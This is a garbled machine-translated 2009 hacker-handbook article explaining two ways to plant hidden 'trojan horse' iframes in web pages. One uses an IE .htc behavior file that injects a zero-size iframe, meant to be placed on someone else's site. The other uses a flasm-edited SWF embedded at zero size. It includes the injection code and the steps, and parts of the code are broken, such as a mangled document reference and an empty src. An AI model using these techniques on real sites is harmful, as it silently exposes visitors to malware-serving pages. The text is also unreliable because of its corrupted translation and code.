Hung it to the two new methods 1 1 hackers Handbook manuscript-a vulnerability warning-the black bar safety net

ID MYHACK58:62200925266
Type myhack58
Reporter 佚名
Modified 2009-11-13T00:00:00


Hung it to the two new methods lcx

Here only to do a technical discussion, not a specific hazard of the things. If you want to use my method to do it, I can't help it, huh. On the hanging horse is basically in a web page the original code of Riga contained an iframe. On loading the iframe, I used articles written by several, this article then mention the two new methods.

First, use the htc file to load the iframe. Baidu Encyclopedia in the htc file is interpreted as: from 5. 5 version start, Internet Explorer IE started to support the Web behavior of the concept. These acts are by the suffix a. htc script file below, which defines a set of methods and properties, the programmer can almost put these methods and properties applied to the HTML any element on the page. Web behavior is very great because they allow programmers to customize the function“connected”to the existing elements and controls, and not have to let the user download binaries such as ActiveX controls to accomplish this function. Web behavior or recommend the extension of the IE object model and control set of the method. Microsoft at its developer site on the DHTML behavior Library section provides several customized Web behavior. These professional term to look at is a headache, we see the practical application. First look at the vbs write the hello. htc ★

<attach event="ondocumentready" ONEVENT="Hello()" />

<script language="VBScript">

Function Hello() MsgBox "Hello, World!" End Function


We'll write a 1. htm to call that code: ★ <html> <body style="behavior: url(hello. htc)"> </body> </html> ★

We put hello. htc and 1. htm in the same directory, with the ie implementation 1. htm it will successfully popup a hello world dialog box. If you use vbs to perform while in the horse the person only to ie users, using Firefox, just missed, we changed to js, the direct use of 1. htm loading a new hello. htc, the new code is: ★ <attach event="ondocumentready" ONEVENT="hello()" />

<script> function hello() { var O = document. createElement("iframe"); O. width = '0'; O. height = '0'; O. src=""; Sames. body. appendChild(O); //note, here is the ownerDocument, this is the essence. } </script> ★

So you put hello. htc transmitted to the other site directory, and then in the other page of Riga on the<body style="behavior: url(hellow1. htc)">can be loaded successfully box plus the, huh, huh.

Second, with regard to swf to load network of the horse easy to approach With swf directly load the iframe is also not a new method, but I have here a simple approach to the software is flasm it. I have done a template, is swf. swf. We under dos run flasm-d swf. swf>swf. flm, as shown in Figure 1.

Figure 1

Wherein flasm-d swf. swf>swf. flm is to generate the swf. flm, if not>swf. flm is a direct display of the source code. You only need to change Figure 1 of which the url address and the height of the frame. To change the address, we then run a command: flasm-a swf. flm is generated, you need the swf, as shown in Figure 2.

Figure 2

We then write a swf. htm call, the code is: ★ <head> </head> <body> <embed src=swf. swf witdh=0 height=0></embed> </body> ★

Note that the<embed src=swf. swf witdh=0 height=0></embed> be sure to add in the body in the middle, or else you will not be successful, this is and I write as code is concerned. If you have any questions, you can go to my blog:<>is.

[文章 中的 文件 1.htm and 以及 swf.htm, swf. htc, flasm. rar has been featured in this disc]

Note: here I do the flash sample is not provided, there is nothing, We mainly look at the htc method.